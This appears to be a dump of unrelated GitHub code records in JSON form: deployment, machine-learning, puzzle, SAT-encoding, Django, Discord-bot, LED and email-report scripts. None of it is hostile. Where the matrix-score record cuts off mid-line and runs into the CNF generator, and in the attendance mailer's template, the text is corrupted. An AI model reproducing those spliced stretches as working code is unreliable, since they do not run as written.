{gcr_multi_region}/{gcp_project_id}/{docker_image_name} .\"\n subprocess.run(build, shell=True)\n\n # Running the docker 
push command with the env variables\n push = f\"docker push {gcr_multi_region}/{gcp_project_id}/{docker_image_name}\"\n subprocess.run(push, shell=True)\n\n deploy = f\"gcloud run deploy --image {gcr_multi_region}/{gcp_project_id}/{docker_image_name} --region {gcr_region}\"\n subprocess.run(deploy, shell=True)\n\nif __name__ == \"__main__\":\n # Asking the user what he wants: testing locally or deploying to Google Container?\n type = input(\"Do you want to test or deploy? \")\n\n if type.lower() == 'test':\n # Testing: executing the docker_test function above\n docker_test(\"container\")\n # Go to localhost://8080 to check if the api.py file works\n\n elif type.lower() == 'deploy':\n # Deploying: pushing local modifications to Google Container (cloud where container is hosted)\n docker_deploy()\n\n else:\n print(\"I didn't understand, please input test or deploy\")\nelse:\n docker_deploy()\n","repo_name":"amaury1104/crypto_2023_03","sub_path":"Back/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"22336077365","text":"import csv\nimport numpy as np\nfrom tensorflow.contrib.learn import DNNClassifier, infer_real_valued_columns_from_input\n\n\ndef formalize(y, num_labels):\n m = len(y)\n yvec = np.zeros((m, num_labels))\n for i in range(m):\n yvec[i, int(y.item(i))-1] = 1\n\n return yvec.astype(np.int32)\n\n\ndef to_int(arr):\n mat = np.mat(arr)\n m, n = mat.shape\n ret = np.zeros((m, n))\n for i in range(m):\n for j in range(n):\n ret[i, j] = mat[i, j]\n return ret.astype(np.int32)\n\n\ndef load_train_data():\n l = []\n with open(\"train.csv\") as f:\n lines = csv.reader(f)\n for line in lines:\n l.append(line)\n l.remove(l[0])\n l = np.array(l)\n labels = l[:, :1]\n data = l[:, 1:]\n return to_int(data), formalize(to_int(labels), 10)\n\n\ndef load_test_data():\n l = []\n with open(\"test.csv\") as f:\n lines = csv.reader(f)\n for line in lines:\n l.append(line)\n l.remove(l[0])\n return to_int(l)\n\n\ntrain_images, train_labels = load_train_data()\ntest_images = load_test_data()\nprint(train_images[0])\n\nfeature_columns = infer_real_valued_columns_from_input(train_images)\nclf = DNNClassifier([100], feature_columns, n_classes=10)\nprint(train_images.shape)\nprint(train_labels.shape)\nclf.fit(train_images, train_labels)\nprint(\"done training\")\n\npred = clf.predict(test_images[0])\nprint(pred)\n","repo_name":"kevwan/mlpy","sub_path":"python/kaggle/digitrecognizer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23179144793","text":"class Binary_Tree_Node:\n def __init__(self, data=None, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\n def add_node(self, data):\n if data == self.data:\n return\n if data < self.data:\n if self.left:\n self.left.add_node(data)\n else:\n self.left = Binary_Tree_Node(data)\n else:\n if self.right:\n self.right.add_node(data)\n else:\n self.right = Binary_Tree_Node(data)\n\n def find_node(self,data):\n if self.data is None:\n return False\n if data == self.data:\n return True\n if data < self.data:\n if self.left:\n return self.left.find_node(data)\n else:\n return False\n if data > self.data:\n if self.right:\n return self.right.find_node(data)\n else:\n return False\n\n\n\n\n\n\nbst = 
Binary_Tree_Node(6)\nbst.add_node(6)\nbst.add_node(5)\nbst.add_node(7)\n\n# print(bst.data, bst.left.data, bst.right.data)\nprint(bst.find_node(5))\n","repo_name":"AdilovM/lc","sub_path":"binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34863832388","text":"tog = [[0,1],[0,1],[0,1],[0,0]]\n\ndef matrixScore(tog):\n    # First transform the rows\n    row = len(tog)\n    column = len(tog[0])\n    for r in range(row):\n\n        if tog[r][0]==0:\n            for c in range(column):\n                if tog[r][c] ==0:\n                    tog[r][c]=1\n                else:\n                    tog[r][c]=0\n    print(row,column)\n    # Then transform the columns\n    for c in range(1,column):\n        num_1 = 0\n        for r in range(row):\n            if tog[r][c]==1:\n                num_1 +=1\n        print(num_1,row/2)\n        if num_1 List[List[int]]:\n    n = len(x) - 1\n    clauses = []\n\n    # TODO: Return 2nk+n-3k-1 clauses that are satisfiable iff at most k\n    # of the n variables x[i] are True\n\n    s = [[] for i in range(n+1)]\n\n    #add !x1|s1,1\n    global NVAR\n\n    for i in range(1, n):\n        s[i].append(0)\n        for j in range(1, k+1):\n            s[i].append(NVAR)\n            NVAR = NVAR + 1\n\n    a = 1\n\n    firstCla = [-x[1], s[1][1]]\n    clauses.append(firstCla)\n\n\n    #add !s1,j where 1 < j <= k\n    for j in range(2, k+1):\n        clauses.append([-s[1][j]])\n\n    #add third part\n    for i in range(2, n):\n        clauses.append([-x[i], s[i][1]])\n        clauses.append([-s[i-1][1], s[i][1]])\n        for j in range(2,k + 1):\n            clauses.append([-x[i], -s[i-1][j-1], s[i][j]])\n            clauses.append([-s[i-1][j], s[i][j]])\n        clauses.append([-x[i], -s[i-1][k]])\n\n    #add last part\n    clauses.append([-x[n], -s[n-1][k]])\n\n    #print(clauses)\n    assert len(clauses) == 2 * n * k + n - 3 * k - 1\n    return clauses\n\n# <=k(x1,...,xn) <--> >=(n-k)(!x1,...,xn)\ndef at_least(k: int, x: List[int]) -> List[List[int]]:\n    n = len(x) - 1\n    clauses = []\n    for i in range(len(x)):\n        x[i] = -x[i]\n    clauses = at_most(n-k, x)\n\n    return clauses\n\n\ndef and_imply(x: List[int], b: int) -> List[List[int]]:\n    # Return a set of clauses that encodes (x[0] /\\ ... /\\ x[n-1]) -> b:\n    # the implication rewrites to the single clause !x[0] \\/ ... \\/ !x[n-1] \\/ b\n    clause = [-xi for xi in x]\n    clause.append(b)\n    return [clause]\n\n\ndef or_imply(x: List[int], b: int) -> List[List[int]]:\n    # Return a set of clauses that encodes (x[0] \\/ ... \\/ x[n-1]) -> b\n    clause = []\n    clauses = []\n    if b == 1:\n        for i in range(len(x)):\n            clause.append(x[i])\n        clauses.append(clause)\n    elif b == 0:\n        # (x[0] \\/ ... \\/ x[n-1]) -> False forces every x[i] to be false\n        for xi in x:\n            clauses.append([-xi])\n    # print(clauses)\n    return clauses\n
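\n# Illustrative check of the sequential-counter encoding in at_most above\n# (hypothetical numbers; x is 1-based with a dummy entry at index 0, and the\n# global NVAR must already point past the variable ids listed in x):\n#   NVAR = 5\n#   clauses = at_most(2, [0, 1, 2, 3, 4])       # n = 4 variables, k = 2\n#   assert len(clauses) == 2*4*2 + 4 - 3*2 - 1  # = 13, matching the assert above\n# Each auxiliary variable s[i][j] reads as \"at least j of x[1..i] are true\".\n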
\ndef gen_cnf(d: int, c: int, e: int) -> Tuple[int, List[List[int]]]:\n    nvar = 0  # the number of boolean variables (required by DIMACS CNF)\n    cnf = []  # a list of clauses\n\n    # Generate and add clauses to cnf, by calls to at_most, and_imply,\n    # and or_imply. Also set nvar accordingly.\n    t = int(d / c)\n    global NVAR\n\n    # variable list: varList[i][j][k] means whether the ith diner eats at the kth table on the jth evening\n    varList = [[[] for j in range(e)] for i in range(d)]\n    for i in range(d):\n        for j in range(e):\n            for k in range(t):\n                varList[i][j].append(NVAR)\n                NVAR = NVAR + 1\n\n    # Constraint 1: every diner eats at exactly one table each evening\n    for i in range(d):\n        for j in range(e):\n            oneTable = []\n            oneTable.append(0)\n            for k in range(t):\n                # find all variables that tell whether a fixed diner eats at the kth table on a fixed evening\n                oneTable.append(varList[i][j][k])\n            # the diner must sit at at most one table\n            clauses = at_most(1, oneTable)\n            for c1 in range(len(clauses)):\n                cnf.append(clauses[c1])\n            oneTable.remove(0)\n\n            # the diner must sit at at least one table (x1\\/x2...\\/xn)\n            clauses = or_imply(oneTable, 1)\n            for c2 in range(len(clauses)):\n                cnf.append(clauses[c2])\n\n    # Constraint 2: exactly c diners eat at each table each evening\n    for j in range(e):\n        for k in range(t):\n            cDiners = []\n            cDiners.append(0)\n            for i in range(d):\n                # find all variables that tell whether the ith diner eats at a fixed table on a fixed evening\n                cDiners.append(varList[i][j][k])\n            # the table must serve exactly c people = at_most c /\\ at_least c\n            clauses1 = at_most(c, cDiners)\n            for c3 in range(len(clauses1)):\n                cnf.append(clauses1[c3])\n            clauses2 = at_least(c, cDiners)\n            for c4 in range(len(clauses2)):\n                cnf.append(clauses2[c4])\n\n    # Constraint 3: a diner can only eat with people they have not dined with yet\n    constraint2_clauses = constraint2(varList, d, e, t)\n    for i in range(len(constraint2_clauses)):\n        cnf.append(constraint2_clauses[i])\n    nvar = NVAR\n    return nvar, cnf\n\n\ndef constraint2(varList, d: int, e: int, t: int):\n\n    clauses = []\n    # x1 /\\ x2 ==> !(x3 /\\ x4) = !x1 \\/ !x2 \\/ !x3 \\/ !x4\n    for i in range(d):\n        for j in range(i+1, d):\n            for x1 in range(e):\n                for y1 in range(t):\n                    twoDiner = []\n                    twoDiner.append(-varList[i][x1][y1])\n                    twoDiner.append(-varList[j][x1][y1])\n                    for x2 in range(e):\n                        if x1 != x2:\n                            for y2 in range(t):\n                                noTogether = []\n                                noTogether.append(twoDiner[0])\n                                noTogether.append(twoDiner[1])\n                                noTogether.append(-varList[i][x2][y2])\n                                noTogether.append(-varList[j][x2][y2])\n                                clause = or_imply(noTogether, 1)\n                                clauses.append(clause[0])\n\n    return clauses\n\n\nif __name__ == \"__main__\":\n\n    try:\n        d = int(sys.argv[1])\n        c = int(sys.argv[2])\n        e = int(sys.argv[3])\n    except IndexError:\n        print('Usage: cruDes d c e')\n        sys.exit(1)\n\n    nvar, cnf = gen_cnf(d, c, e)\n\n    # Output to stdout in DIMACS CNF format\n    with open('in.dimacs', 'w') as f:\n        f.write(f'p cnf {nvar} {len(cnf)}')\n        f.write('\\n')\n        for clause in cnf:\n            f.write(f'{\" \".join([str(var) for var in clause])} 0')\n            f.write('\\n')\n    print(\"CNF generated successfully\")","repo_name":"Marksmug/Vigenere-Group","sub_path":"cruDes.py","file_name":"cruDes.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7260480587","text":"\"\"\"Unit Tests for the socialprofile module forms\"\"\"\nimport logging\n\nfrom django.test import TestCase\nfrom social_core.backends.google import GoogleOAuth2\nfrom social_core.backends.twitter import TwitterOAuth\n\nfrom socialprofile.models import SocialProfile\nfrom socialprofile.pipeline import socialprofile_extra_values\n\nLOGGER = logging.getLogger(name=\"socialprofile.test_pipeline\")\n\n\nclass SocialProfilePipelineTestCase(TestCase):\n    \"\"\"Test Case for Social Profile Pipeline\"\"\"\n\n    def 
setUp(self):\n \"\"\"Set up common assets for tests\"\"\"\n LOGGER.debug(\"SocialProfile Pipeline Tests setUp\")\n self.user1 = SocialProfile.objects.create_user(\n \"user1\", \"user1@user1.com\", \"user1password\"\n )\n self.user1.gender = \"other\"\n self.user1.url = \"http://test.com\"\n self.user1.description = \"Test User 1\"\n self.user1.image_url = (\n \"http://www.gravatar.com/avatar/00000000000000000000000000000000?d=mm\"\n )\n self.user1.save()\n\n # self.sa1 = UserSocialAuth.objects.create(user=self.user1, provider='google-oauth2', uid='user1@user1.com')\n def test_socialprofile_pipeline_google(self):\n \"\"\"Test editing executing pipeline methods in isolation for google\"\"\"\n LOGGER.debug(\"Test socialprofile pipeline Google\")\n backend = GoogleOAuth2()\n response = {\n \"name\": {\"familyName\": \"User 1\", \"givenName\": \"Test\"},\n \"gender\": \"other\",\n \"image\": {\"url\": \"http://image.url\"},\n \"occupation\": \"User Description\",\n \"url\": \"http://test.com\",\n }\n\n socialprofile_extra_values(backend, {}, response, \"1\", self.user1)\n self.assertEqual(self.user1.description, \"User Description\")\n self.assertEqual(self.user1.gender, \"other\")\n self.assertEqual(self.user1.image_url, \"http://image.url\")\n self.assertEqual(self.user1.url, \"http://test.com\")\n\n # def test_socialprofile_pipeline_facebook(self):\n # \"\"\"Test editing executing pipeline methods in isolation for facebook\"\"\"\n # LOGGER.debug(\"Test socialprofile pipeline Facebook\")\n # backend = Facebook2OAuth2()\n # response = {\n # 'name': {\n # 'last_name': 'User 1',\n # 'first_name': 'Test'\n # },\n # 'gender': 'other',\n # 'picture': {'data': {'url': 'http://image.url'}},\n # 'link': 'http://test.com'\n # }\n #\n # socialprofile_extra_values(backend, {}, response, '1', self.user1)\n # self.assertEquals(self.user1.gender, 'other')\n # self.assertEquals(self.user1.image_url, 'http://image.url')\n # self.assertEquals(self.user1.url, 'http://test.com')\n\n def test_socialprofile_pipeline_twitter(self):\n \"\"\"Test editing executing pipeline methods in isolation for twitter\"\"\"\n LOGGER.debug(\"Test socialprofile pipeline Twitter\")\n backend = TwitterOAuth()\n response = {\n \"name\": {\"last_name\": \"User 1\", \"first_name\": \"Test\"},\n \"gender\": \"other\",\n \"profile_image_url_https\": \"http://image.url\",\n \"description\": \"User Description\",\n \"url\": \"http://test.com\",\n }\n\n socialprofile_extra_values(backend, {}, response, \"1\", self.user1)\n self.assertEqual(self.user1.description, \"User Description\")\n self.assertEqual(self.user1.gender, \"other\")\n self.assertEqual(self.user1.image_url, \"http://image.url\")\n self.assertEqual(self.user1.url, \"http://test.com\")\n","repo_name":"DLRSP/django-sp","sub_path":"tests/test_pipeline.py","file_name":"test_pipeline.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"1465526758","text":"import nextcord\nfrom nextcord.ext import commands\n\n\nclass Stop(commands.Cog):\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @nextcord.slash_command(\n name=\"stop\",\n description=\"Stop the Bot, stop it before it lays eggs\",\n force_global=True\n )\n @commands.is_owner()\n async def stp(self, ctx: nextcord.Interaction):\n await ctx.send(\"ok\")\n exit()\n\n\ndef setup(bot):\n 
bot.add_cog(Stop(bot))\n","repo_name":"openblocki/DiscordBott","sub_path":"apps/op/stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"1040119392","text":"from django.shortcuts import render,get_object_or_404, redirect\nfrom django.http import JsonResponse,HttpResponseRedirect, HttpResponse\nfrom django.conf import settings\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.views import View\nfrom django.views.generic.detail import SingleObjectMixin\nfrom django.views.generic import ListView, FormView,CreateView,DetailView\nfrom .models import *\nfrom .forms import ReviewForm\nfrom account.models import CustomUser\nfrom django.contrib import messages\nfrom django.urls import reverse, reverse_lazy\n# Create your views here.\n\nclass ProductListView(ListView):\n    context_object_name = 'products'\n    paginate_by = 6\n    model = Product\n    template_name = 'product/home.html'\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['nbar'] = \"products\"\n        return context\n\n\n# @login_required(login_url='account/login')\ndef add_to_cart(request):\n    context = {}\n    if request.user.is_authenticated:\n        items = Cart.objects.filter(customer__id=request.user.id,status=False)\n        context['items'] = items\n        if request.method == \"POST\":\n            pid = request.POST['pid']\n            qty = request.POST['qty']\n            do_exist = Cart.objects.filter(product__id=pid, customer__id=request.user.id, status=False)\n            if len(do_exist) > 0:\n                messages.warning(request,'Item already exists in your cart.')\n                return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n            else:\n                product = get_object_or_404(Product, id=pid)\n                usr = get_object_or_404(CustomUser,id=request.user.id)\n                c = Cart(customer=usr, product=product,quantity=qty)\n                c.save()\n                messages.success(request, '{} Added to your cart'.format(product.name))\n                return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n    else:\n        # anonymous user\n        pass\n    return render(request, 'product/cart_detail.html', context)\n\n    #using ajax to get cart details\ndef get_cart_data(request):\n    items = Cart.objects.filter(customer__id=request.user.id, status=False)\n    # set initial values to 0\n    total,quantity,num = 0,0,0\n    #loop through items in cart\n    for item in items:\n        total += float(item.product.price) * item.quantity  # cart total\n        quantity += int(item.quantity)\n        num += 1  # number of items in cart\n    res = {\"total\":total,\"quantity\":quantity,\"num\":num}\n    return JsonResponse(res)\n\ndef change_quan(request):\n    if \"quantity\" in request.GET:\n        cid = request.GET[\"cid\"]\n        qty = request.GET[\"quantity\"]\n        cart_obj = get_object_or_404(Cart,id=cid)\n        cart_obj.quantity = qty\n        cart_obj.save()\n        return HttpResponse(cart_obj.quantity)\n\n    if \"delete_cart\" in request.GET:\n        id = request.GET[\"delete_cart\"]\n        cart_obj = get_object_or_404(Cart,id=id)\n        cart_obj.delete()\n        return HttpResponse(1)\n\n\nclass ShowCategory(View):\n    def get(self, request, category_slug):\n        pcat = get_object_or_404(Category,slug=category_slug)\n        categories = Category.objects.filter(parent=pcat)\n        return render(request,'product/category.html',{'categories':categories,'pcat':pcat})\n\n\nclass ShowSubCategory(View):\n    def get(self, request, cat_slug=None):\n        if cat_slug:\n            cat = get_object_or_404(Category,slug=cat_slug)\n            products = Product.objects.filter(category=cat)\n\n        return 
render(request, 'product/sub_category.html', {'products':products,'cat':cat})\n\nclass AllCategories(View):\n def get(self, request):\n categories = Category.objects.filter(parent__isnull=False)\n context = {'categories':categories}\n return render(request, 'product/allcategories.html', context)\n\n\n@login_required\ndef add_review(request, id):\n product = get_object_or_404(Product, id=id)\n form = ReviewForm(request.POST)\n context = {'form':form}\n if 'review' in request.POST:\n proid = request.POST.get('proid')\n if form.is_valid():\n data = Review()\n data.name = form.cleaned_data.get('name')\n data.message = form.cleaned_data.get('message')\n data.rating = form.cleaned_data.get('rating')\n data.ip = request.META.get('REMOTE_ADDR')\n data.product = proid\n data.user = request.user\n data.save()\n messages.success(request, 'review added successfully.')\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n return render(request, 'product/product_detail.html', context)\n\n# class AddReview(CreateView):\n# model = Review\n# template_name = 'product/product_review.html'\n# form_class = ReviewForm\n# success_url = reverse_lazy('product:products')\n \n# def form_valid(self, form):\n# form.instance.product_id = self.kwargs['id']\n# form.instance.ip = self.request.META.get('REMOTE_ADDR')\n# form.instance.name = self.request.user\n# # form.instance.next = self.request.POST.get('next')\n# return super().form_valid(form)\n\n \n\n\n\nclass ReviewDisplay(DetailView):\n model = Product\n template_name = 'product/product_detail.html'\n context_object_name = 'product'\n\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n self.object = self.get_object()\n product = self.object\n ppictures = Picture.objects.filter(product=product)\n specifications = product.specification.split(\",\")\n context['ppictures'] = ppictures\n context['specifications'] = specifications\n context['form'] = ReviewForm()\n return context\n\nclass Reviewproduct(SingleObjectMixin, FormView):\n model = Product\n form_class = ReviewForm\n template_name = 'product/product_review.html' \n\n def post(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().post(request, *args, **kwargs)\n\n def get_form_kwargs(self):\n kwargs = super(Reviewproduct, self).get_form_kwargs()\n kwargs['request'] = self.request\n return kwargs\n\n def form_valid(self, form):\n review = form.save(commit=False)\n review.product = self.object\n review.ip = self.request.META.get('REMOTE_ADDR')\n review.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n product = self.object\n return reverse('product:product-detail', kwargs={'id':product.id,'slug':product.slug})+'#reviews'\n\n\nclass ProductDetail(View):\n def get(self, request, *args, **kwargs):\n view = ReviewDisplay.as_view()\n return view(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n view = Reviewproduct.as_view()\n return view(request, *args, **kwargs)\n # def get(self, request, id, slug):\n # product = get_object_or_404(Product, id=id, slug=slug)\n # # review = get_object_or_404(Review, product=product.id)\n # ppictures = Picture.objects.filter(product=product)\n # specifications = product.specification.split(\",\")\n # context = {'product':product,'ppictures':ppictures,'specifications':specifications}\n # return render(request, 'product/product_detail.html', 
context)\n\n","repo_name":"Dee68/gingerscotch","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19332692363","text":"#!/usr/bin/env python\n\n# Daniel Grubbs\n# Date: 1/31/2018\n\n\ndef f_tuple(t):\n    \"\"\"Setup the format for printing the tuple.\"\"\"\n    print(\"file_{:03}: {:.2f} {:.2e} {:.3e}\".format(t[0], t[1], t[2], t[3]))\n\n\nf_tuple((2, 123.4567, 10000, 12345.67))\n\n\nt = (1, 2, 3, 4, 5)\nprint('The three numbers: {} {} {}'.format(*t))\n\n\ndef formatter(nums):\n    \"\"\"Dynamic strings with variable lengths.\"\"\"\n    form_string = ''\n    for num in nums:\n        form_string = form_string + '{:d} '\n    temp = form_string.split()\n    space = ', '\n    form_string = space.join(temp)\n    form_string = 'The ' + str(len(nums)) + ' numbers are: ' + form_string\n    return form_string.format(*nums)\n\n\nprint(formatter((4, 6, 8, 10, 12)))\n\n\n# Task 4\ntask4_tup = (4, 30, 2017, 2, 27)\nprint('{} {} {} {} {}'.format(*task4_tup))\nprint('{3:02d} {1} {2} {0:02d} {4}'.format(4, 30, 2017, 2, 27))\n\n# Task 5\ntask5_list =['orange', 1.3, 'lemon', 1.1]\nprint('The weight of an {} is {} and the weight of a {} is {}'.format(*task5_list))\n\n\n# Task 6\nprint('{:20}{:10}{:20}{:8}'.format('First', '$99.01', 'Second', '$88.09'))","repo_name":"UWPCE-PythonCert-ClassRepos/Wi2018-Online","sub_path":"students/daniel_grubbs/lesson03/strformat_lab.py","file_name":"strformat_lab.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37916834249","text":"\r\n\r\nl, kmax = list(map(int, input().strip().split()))\r\nn= input().strip()\r\n\r\ndef FoldItUp(l, n):\r\n    # Fold the input string over itself; return the middle char\r\n    # as well if dealing with an odd number of characters\r\n    if l % 2 == 0:\r\n        folded, middle = list(zip(n[:(l//2)+1], list(reversed(n[(l//2):])))), ''\r\n    else:\r\n        folded, middle = list(zip(n[:(l//2)], list(reversed(n[(l//2)+1:])))), str(n[l//2])\r\n\r\n    # Now, iterate over each tuple in folded. If equal, condense to single-val;\r\n    # else, leave as-is and maintain a count.\r\n    # Example: n1 = '123329' becomes: [['1','9'], ['2'], ['3']]\r\n    ct = 0\r\n    new_list = []\r\n    for x, y in folded:\r\n        if x == y:\r\n            new_list.append([x])\r\n        else:\r\n            ct += 1\r\n            new_list.append([x,y])\r\n    return new_list, middle, ct\r\n\r\nfolded, middle_char, kmin = FoldItUp(l, n)\r\nnew_string, changes_made = '', 0\r\n\r\n# Kmin is the minimum number of necessary changes\r\n# in order to make a palindrome\r\nif kmax >= kmin:\r\n    for idx in folded:\r\n        if kmax - kmin > changes_made:\r\n            # just make it 9\r\n            if len(idx) < 2:\r\n                if idx != ['9'] and (kmax-(kmin + changes_made) >=2):\r\n                    new_string += '9'\r\n                    changes_made += 2\r\n                else:\r\n                    new_string += idx[0]\r\n            else:\r\n                kmin -= 1\r\n                if max(idx) == '9':\r\n                    new_string += '9'\r\n                    changes_made +=1\r\n                elif kmax-(kmin + changes_made) >=2:\r\n                    new_string += '9'\r\n                    changes_made +=2\r\n                else:\r\n                    new_string += max(idx)\r\n        else:\r\n            # make it the greater of the two val options\r\n            new_string += max(idx)\r\n            if len(idx) == 2:\r\n                changes_made += 1\r\n                kmin -= 1\r\n    if middle_char and changes_made < kmax:\r\n        middle_char = '9'\r\n        changes_made += 1\r\nelse:\r\n    # Not enough allowed changes (k) to make a palindrome -- why bother? 
-- let's go eat.\r\n new_string = None\r\n\r\nresult = str(new_string + middle_char + ''.join(list(reversed(new_string)))) if new_string is not None else '-1'\r\nprint(result)\r\n\r\n\r\n","repo_name":"t753/Hackerrank-solutions","sub_path":"richierich_hr.py","file_name":"richierich_hr.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35863471353","text":"import time\nimport board\nimport busio\nfrom rainbowio import colorwheel\nfrom adafruit_seesaw import seesaw, neopixel\n\ni2c = busio.I2C(board.SCL, board.SDA)\nss = seesaw.Seesaw(i2c, addr=0x60)\nneo_pin = 15\nnum_pixels = 64\n\npixels = neopixel.NeoPixel(ss, neo_pin, num_pixels, brightness = 0.1)\n\ncolor_offset = 0\n\nwhile True:\n for i in range(num_pixels):\n rc_index = (i * 256 // num_pixels) + color_offset\n pixels[i] = colorwheel(rc_index & 255)\n pixels.show()\n color_offset += 1\n time.sleep(0.01)\n","repo_name":"adafruit/Adafruit_Learning_System_Guides","sub_path":"NeoDriver_seesaw_Examples/CircuitPython_NeoDriver_seesaw/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":913,"dataset":"github-code","pt":"5"} +{"seq_id":"39935972648","text":"from os import path\r\nimport smtplib\r\nimport datetime\r\nfrom datetime import date\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom xml.etree import ElementTree\r\n#from service import *\r\nfrom msaccess import Str_C_date, res\r\nfrom jinja2 import Environment\r\nfrom bs4 import BeautifulSoup\r\nfrom holi import response\r\nimport schedule\r\n#print(\"Response :\",response)\r\n# result = next(item['value'] for item in response if item[\"key\"] == \"Host\")\r\n\r\nclass AttendanceEmail:\r\n\r\n def get_ml_vales(self,key):\r\n result = next(item['value'] for item in response if item[\"key\"] == key)\r\n return result\r\n \r\n def generate_message(self,SENDER_EMAIL,RECEIVER_EMAIL,HTML,mail_subject ,message):\r\n message['Subject'] = mail_subject\r\n message['From'] = SENDER_EMAIL\r\n message['To'] = RECEIVER_EMAIL\r\n return message\r\n def fetchData(self,Str_C_date):\r\n tree = ElementTree.parse(\"Config.xml\")\r\n print(type(tree))\r\n root = tree.getroot()\r\n details = []\r\n for holiday in root.findall(\".//Holiday\"):\r\n loop = holiday\r\n count = len(loop)\r\n count_value = range(0,count) \r\n for i in count_value:\r\n test = (loop[int(i)].attrib)\r\n if(test[\"value\"] == Str_C_date):\r\n return True\r\n return False\r\n\r\n\r\n def send_message(self,HTML,Str_C_date):\r\n xml = response\r\n SENDER_EMAIL = self.get_ml_vales(\"FromMail\")\r\n print(\"sender mail :\",SENDER_EMAIL)\r\n message = MIMEMultipart()\r\n day = datetime.datetime.strptime(Str_C_date, '%d-%m-%Y').weekday() \r\n if(self.fetchData(Str_C_date)):\r\n alert = self.get_ml_vales(\"HolidaySubject\")\r\n mail_subject = alert+\" \"+Str_C_date\r\n message = MIMEMultipart(\"alternative\", None, [MIMEText(Environment().from_string(HTML).render(Str_C_date=Str_C_date,res = res,), \"html\")])\r\n elif(day == 5 or day == 6):\r\n alert = self.get_ml_vales(\"WeekendSubject\")\r\n mail_subject = alert+\" \"+Str_C_date\r\n message = MIMEMultipart(\"alternative\", None, [MIMEText(Environment().from_string(HTML).render(Str_C_date=Str_C_date,res = res,), \"html\")])\r\n else:\r\n daily = self.get_ml_vales(\"WorkingDaySubject\")\r\n mail_subject = daily+\" \"+Str_C_date\r\n message = 
MIMEMultipart(\"alternative\", None, [MIMEText(Environment().from_string(HTML).render(Str_C_date=Str_C_date,res = res,), \"html\")])\r\n sender = self.get_ml_vales(\"ToMail\")\r\n x = sender.split(\",\")\r\n for val in x :\r\n RECEIVER_EMAIL = val\r\n print(\"Receiver mail :\",RECEIVER_EMAIL)\r\n SENDER_PASSWORD = self.get_ml_vales(\"Password\")\r\n host = self.get_ml_vales(\"Host\")\r\n port = self.get_ml_vales(\"Port\")\r\n SERVER = host+\":\"+port\r\n message = self.generate_message(SENDER_EMAIL,RECEIVER_EMAIL,HTML,mail_subject,message )\r\n server = smtplib.SMTP(SERVER)\r\n server.ehlo()\r\n server.starttls()\r\n server.login(SENDER_EMAIL, SENDER_PASSWORD)\r\n server.sendmail(SENDER_EMAIL, RECEIVER_EMAIL, message.as_string())\r\n server.quit()\r\n print(\"Mail Sent\")\r\n \r\n\r\n def schedule(self):\r\n interval1 = self.get_ml_vales(\"Interval 1\")\r\n interval2 = self.get_ml_vales(\"Interval 2\")\r\n schedule.every().day.at(interval1).do(self.send_message,HTML,Str_C_date)\r\n schedule.every().day.at(interval2).do(self.send_message,HTML,Str_C_date)\r\n while 1:\r\n schedule.run_pending()\r\n #time.sleep(1)\r\n\r\n\r\n\r\nHTML = \"\"\"\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n
HTML = \"\"\"\r\n<html>\r\n<body>\r\n    <h3>The Attendance Report {{Str_C_date}}</h3>\r\n    <table border=\"1\" cellpadding=\"4\">\r\n        <tr>\r\n            <th>S.No</th>\r\n            <th>Employee Name</th>\r\n            <th>Attendance Date</th>\r\n            <th>In Time</th>\r\n            <th>Out Time</th>\r\n        </tr>\r\n        {% if res is defined %}\r\n        {% for list in res %}\r\n        <tr>\r\n            <td>{{list[0]}}</td>\r\n            <td>{{list[1]}}</td>\r\n            <td>{{list[2]}}</td>\r\n            <td>{{list[3]}}</td>\r\n            <td>{{list[4]}}</td>\r\n        </tr>\r\n        {% else %}\r\n        <tr>\r\n            <td colspan=\"5\">No record found</td>\r\n        </tr>\r\n        {% endfor %}\r\n        {% endif %}\r\n    </table>\r\n</body>\r\n</html>
